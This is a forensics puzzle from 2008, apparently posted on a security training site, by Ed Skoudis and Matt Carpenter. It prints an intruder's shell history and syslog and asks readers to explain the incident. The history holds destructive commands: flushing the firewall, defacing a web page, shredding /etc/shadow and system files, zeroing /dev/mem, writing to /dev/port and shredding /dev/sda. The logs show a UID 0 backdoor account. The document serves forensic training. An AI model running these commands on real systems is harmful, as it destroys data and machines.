Overview: Hello, challenge fans. Matt Carpenter and I have brewed up a new one for your analysis. The evidence is below. Analyze it and answer our questions. As always, we’ll choose three winners: one technical champ, one creative victor whose answer is technically correct, and one lucky person chosen at random. As you work through this challenge, please observe this very important warning! As they say on TV, DO NOT TRY THIS AT HOME. We’ll go even further by saying, DO NOT TRY IT AT WORK EITHER. The commands included in this challenge are _highly_ destructive, and some of them are hardware specific. They will hose a machine badly. If you insist on testing the commands, at least use a strongly virtualized environment that isolates virtual hardware from physical hardware, and set a snapshot before each command so that you can revert to a pristine state. We wrote the challenge using VMware Workstation, and did not suffer damage to our underlying hosts. However, we cannot guarantee that your VMware experience will match our own. In other words, to borrow from the TV vernacular yet again, YOUR MILEAGE MAY VARY. Furthermore, some so-called "virtualized environments" other than VMware are merely emulators that do not isolate hardware well, nor do they support snapshots. The commands below could damage such environments, so be very careful. You have been warned!
If you can’t answer this challenge 100%, still send something in to qualify as a random winner. This month’s prize is my book, Malware: Fighting Malicious Code, which I authored with Lenny Zeltser. Each winner gets a signed copy.
–Ed Skoudis, Intelguardians
Author, Counter Hack Reloaded
|
Discuss in Forums {mos_smf_discuss:March 2008 – It Happened One Friday} |

ChicagoCon 2008s
It Happened One Friday
By Matt Carpenter and Ed Skoudis
id unname -a uname -a touch /root/test ls -la /root rm /root/test vi /etc/shadow iptables -F iptables -P INPUT ACCEPT iptables -P OUTPUT ACCEPT iptables -P OUTPUT ACCEPT iptables -P OUTPUT ACCEPT iptables -P OUTPUT ACCEPT iptables -I OUTPUT -m state –state ESTABLISHED,RELATED -j ACCEPT rm /var/www/htdocs/index.html echo "I’m so pwned…." > /var/www/htdocs/index.html echo JiMxNDk3OyYjMTUxMzsmIzE0OTM7JiMxNTA2OyAmIzE0OTI7JiMxNTA0OyYjMTUxMDsmIzE1MTI7 >> /var/www/htdocs/index.html echo JiMxNDk3OyAmIzE0OTM7JiMxNTAyOyYjMTUwMDsmIzE0OTg7ICYjMTQ5MjsmIzE0OTc7JiMxNDky >> /var/www/htdocs/index.html echo OyYjMTQ5MzsmIzE0OTE7JiMxNDk3OyYjMTUwMTs= >> /var/www/htdocs/index.html wget http://localhost/ chmod 666 /var/www/htdocs/index.html wget http://localhost/ mail -s "S0 pwned!" `nc -l -p 54742` < /var/www/htdocs/index.html mke2fs -m 0 /dev/ram9 mke2fs -m 0 /dev/ram8 mke2fs -m 0 /dev/ram7 mkdir -p /mnt/rd mount /dev/ram9 /mnt/rd mkdir /mnt/rd/usr mount /dev/ram8 /mnt/rd/usr mkdir /mnt/rd/lib mount /dev/ram7 /mnt/rd/lib mkdir -p /mnt/rd/var/www/htdocs mkdir -p /mnt/rd/proc mkdir -p /mnt/rd/dev mkdir -p /mnt/rd/tmp cp -ax /var/www/htdocs/index.html /mnt/rd/var/www/htdocs/ vi /tmp/flist.txt cat /tmp/flist.txt | while read file; do dir=`echo "$file" |sed ‘s//[^/]*$//’` ; mkdir -p /mnt/rd/$dir ; cp -ax $file /mnt/rd/$dir; done mount –bind /proc /mnt/rd/proc mount –bind /dev /mnt/rd/dev mkdir /mnt/rd/oldroot cd /mnt/rd pivot_root . oldroot exec chroot . cd cat /etc/shells chsh -s /bin/sh shred -u /oldroot/bin/bash shred -u /oldroot/etc/shadow find /oldroot/root -type f -ls -exec shred -u {} ; find /oldroot/home -type f -ls -exec shred -u {} ; find /oldroot/usr/[a-km-z]* -type f -ls -exec shred -u {} ; find /oldroot/usr/lib/[a-hj-z]* -type f -ls -exec shred -u {} ; find /oldroot/var -type f -ls -exec shred -u {} ; find /oldroot/etc -type f -ls -exec shred -u {} ; mount cat /proc/partitions dumpe2fs -b /dev/sda2 count=1; while [ $count -lt 1000 ]; do echo $count; count=`expr $count + 1`; done >> /tmp/bad1000 mkdir /tmp count=1; while [ $count -lt 1000 ]; do echo $count; count=`expr $count + 1`; done >> /tmp/bad1000 e2fsck -l /tmp/bad1000 /dev/sda2 dumpe2fs -b /dev/sda2 echo "dirty" > /tmp/dirty debugfs –help man debugfs which man fsck you debugfs -w -f /tmp/dirty /dev/sda2 ll ls -la dmidecode |head 50 dd if=/dev/mem bs=1 skip=946272 count=512 |hexdump -C dd if=/dev/mem bs=1 skip=1048400 count=176 |hexdump -C dd if=/dev/zero of=/dev/mem seek=983040 count=65535 bs=1 dd if=/dev/zero of=/dev/mem seek=946272 count=102304 bs=1 printf "x44x44x44x44" |dd of=/dev/port seek=3324 bs=1 printf "x80" | dd of=/dev/port seek=178 bs=1 shred /dev/sda logger Dodge This dd if=/dev/zero of=/dev/mem |
Mar 20 05:10:52 johnboy syslogd 1.4.1#17ubuntu7.1: restart (remote reception). Mar 20 05:41:10 242.229.249.233 syslogd 1.4.1#21ubuntu3: restart. Mar 20 05:35:00 242.229.249.233 sshd[7564]: Accepted password for owner from 228.229.228.233 port 44156 ssh2 Mar 20 05:35:01 242.229.249.233 sshd[7566]: pam_unix(ssh:session): session opened for user owner by (uid=0) Mar 20 05:30:34 242.229.249.233 sudo: owner : TTY=pts/10 ; PWD=/home/owner ; USER=root ; COMMAND=/usr/bin/vi /etc/inetd.conf Mar 20 05:30:54 242.229.249.233 sudo: owner : TTY=pts/10 ; PWD=/home/owner ; USER=root ; COMMAND=/etc/init.d/openbsd-inetd stop Mar 20 05:30:56 242.229.249.233 sudo: owner : TTY=pts/10 ; PWD=/home/owner ; USER=root ; COMMAND=/etc/init.d/openbsd-inetd start Mar 20 05:33:14 242.229.249.233 telnetd[1803]: connect from 228.229.228.233 Mar 20 05:34:24 242.229.249.233 telnetd[6887]: ttloop: retrying Mar 20 05:34:45 242.229.249.233 su[6913]: Successful su for root by owner Mar 20 05:34:45 242.229.249.233 su[6913]: + pts/10 owner:root Mar 20 05:34:45 242.229.249.233 su[6913]: pam_unix(su:session): session opened for user root by owner(uid=1000) Mar 20 05:35:29 242.229.249.233 telnetd[6887]: child process 6888 exited: 0 Mar 20 05:35:29 242.229.249.233 login[6888]: pam_unix(login:session): session closed for user owner Mar 20 06:03:14 242.229.249.233 telnetd[1803]: connect from 240.232.249.228 Mar 20 06:04:24 242.229.249.233 telnetd[6887]: ttloop: retrying Mar 20 06:04:45 242.229.249.233 su[6913]: Successful su for root by owner Mar 20 06:04:45 242.229.249.233 su[6913]: + pts/10 owner:root Mar 20 06:04:45 242.229.249.233 su[6913]: pam_unix(su:session): session opened for user root by owner(uid=1000) Mar 20 06:04:57 242.229.249.233 useradd[6927]: new user: name=luz, UID=0, GID=0, home=/home/luz, shell=/bin/bash Mar 20 06:05:21 242.229.249.233 passwd[6933]: pam_unix(passwd:chauthtok): password changed for luz Mar 20 06:05:23 242.229.249.233 su[6913]: pam_unix(su:session): session closed for user root Mar 20 06:05:29 242.229.249.233 telnetd[6887]: child process 6888 exited: 0 Mar 20 06:05:29 242.229.249.233 login[6888]: pam_unix(login:session): session closed for user owner Mar 20 06:06:00 242.229.249.233 sshd[7564]: Accepted password for owner from 240.232.249.228 port 44156 ssh2 Mar 20 06:06:01 242.229.249.233 sshd[7566]: pam_unix(ssh:session): session opened for user luz by (uid=0) Mar 20 06:27:28 242.229.249.233 postfix/pickup[6046]: 54E38488E8: uid=0 from=<root> Mar 20 06:27:28 242.229.249.233 postfix/cleanup[6208]: 54E38488E8: message- id=<20080317113539.54E38488E8@humanoid> Mar 20 06:27:28 242.229.249.233 postfix/qmgr[6047]: 54E38488E8: from=<luz>, size=385, nrcpt=2 (queue active) Mar 20 06:27:51 242.229.249.233 chsh[11491]: changed user `luz’ shell to `/bin/sh’ Mar 20 13:24:16 192.168.255.133 CRON[5703]: Authentication service cannot retrieve authentication info. Mar 21 05:10:52 johnboy syslogd 1.4.1#17ubuntu7.1: restart (remote reception). Mar 21 13:02:43 242.229.249.233 luz: Dodge This Mar 22 05:10:53 johnboy syslogd 1.4.1#17ubuntu7.1: restart (remote reception). Mar 23 03:31:15 242.229.249.233 syslogd 1.4.1#17ubuntu7: restart. Mar 23 03:31:16 242.229.249.233 kernel: Inspecting /boot/System.map-2.6.15-27-386 Mar 23 03:31:17 242.229.249.233 kernel: Loaded 23031 symbols from /boot/System.map- 2.6.15-27-386. Mar 23 03:31:17 242.229.249.233 kernel: Symbols match kernel version 2.6.15. Mar 23 03:31:17 242.229.249.233 kernel: No module symbols loaded – kernel modules not enabled. Mar 23 03:31:17 242.229.249.233 kernel: [17179569.184000] Linux version 2.6.15-27-386 (buildd@terranova) (gcc version 4.0.3 (Ubuntu 4.0.3-1ubuntu5)) #1 PREEMPT Sat Sep 16 01:51:59 UTC 2006 Mar 23 03:31:17 242.229.249.233 kernel: [17179569.184000] BIOS-provided physical RAM map: Mar 23 03:31:17 242.229.249.233 kernel: [17179569.184000] BIOS-e820: 0000000000000000 – 000000000009f800 (usable) Mar 23 03:31:18 242.229.249.233 kernel: [17179569.184000] BIOS-e820: 000000000009f800 – 00000000000a0000 (reserved) Mar 23 03:31:18 242.229.249.233 kernel: [17179569.184000] BIOS-e820: 00000000000ca000 – 00000000000cc000 (reserved) Mar 23 03:31:18 242.229.249.233 kernel: [17179569.184000] BIOS-e820: 00000000000dc000 – 0000000000100000 (reserved) Mar 23 03:31:18 242.229.249.233 kernel: [17179569.184000] BIOS-e820: 0000000000100000 – 000000000fef0000 (usable) Mar 23 03:31:18 242.229.249.233 kernel: [17179569.184000] BIOS-e820: 000000000fef0000 – 000000000fefc000 (ACPI data) Mar 23 03:31:18 242.229.249.233 kernel: [17179569.184000] BIOS-e820: 000000000fefc000 – 000000000ff00000 (ACPI NVS) Mar 23 03:31:18 242.229.249.233 kernel: [17179569.184000] BIOS-e820: 000000000ff00000 – 0000000010000000 (usable) Mar 23 03:31:18 242.229.249.233 kernel: [17179569.184000] BIOS-e820: 00000000fec00000 – 00000000fec10000 (reserved) Mar 23 03:31:18 242.229.249.233 kernel: [17179569.184000] BIOS-e820: 00000000fee00000 – 00000000fee01000 (reserved) Mar 23 03:31:18 242.229.249.233 kernel: [17179569.184000] BIOS-e820: 00000000fffe0000 – 0000000100000000 (reserved) Mar 23 03:31:18 242.229.249.233 kernel: [17179569.184000] 0MB HIGHMEM available. Mar 23 03:31:18 242.229.249.233 kernel: [17179569.184000] 256MB LOWMEM available. Mar 23 03:31:18 242.229.249.233 kernel: [17179569.184000] found SMP MP-table at 000f6ce0 Mar 23 03:31:18 242.229.249.233 kernel: [17179569.184000] On node 0 totalpages: 65536 Mar 23 03:31:18 242.229.249.233 kernel: [17179569.184000] DMA zone: 4096 pages, LIFO batch:0 Mar 23 03:31:18 242.229.249.233 kernel: [17179569.184000] DMA32 zone: 0 pages, LIFO batch:0 Mar 23 03:31:18 242.229.249.233 kernel: [17179569.184000] Normal zone: 61440 pages, LIFO batch:15 Mar 23 03:31:18 242.229.249.233 kernel: [17179569.184000] HighMem zone: 0 pages, LIFO batch:0 Mar 23 03:31:18 242.229.249.233 kernel: [17179569.184000] DMI present. Mar 23 03:31:20 242.229.249.233 kernel: [17179700.268000] apm: BIOS version 1.2 Flags 0x03 (Driver version 1.16ac) Mar 23 03:31:20 242.229.249.233 kernel: [17179700.272000] apm: overridden by ACPI. Mar 23 03:31:29 242.229.249.233 sshd[4030]: Server listening on :: port 22. Mar 23 03:31:31 242.229.249.233 anacron[4131]: Anacron 2.3 started on 2008-03-23 Mar 23 03:31:33 242.229.249.233 anacron[4131]: Normal exit (0 jobs run) Mar 23 03:31:33 242.229.249.233 /usr/sbin/cron[4156]: (CRON) INFO (pidfile fd = 3) Mar 23 03:31:33 242.229.249.233 /usr/sbin/cron[4157]: (CRON) STARTUP (fork ok) Mar 23 03:31:33 242.229.249.233 /usr/sbin/cron[4157]: (CRON) INFO (Running @reboot jobs) |
Question:
1) What happened… and why?
Submit your answers to skillz0308@ethicalhacker.net with the subject line "Skillz Submission" by Sunday April 20, 2008 for a chance to win an autographed copy of my book, Malware: Fighting Malicious Code. The autograph will congratulate you on your prowess in mastering this challenge! We’ll choose three winners, as usual, one in each of the three following categories:
– Best Technical Answer
– Best Creative Answer (that is also technically correct)
– Random Draw (Anyone can win, so send in a response even if you have no faith in your ability to win)
Ed Skoudis
Author, Counter Hack Reloaded
SANS Institute Fellow
Co-founder, Intelguardians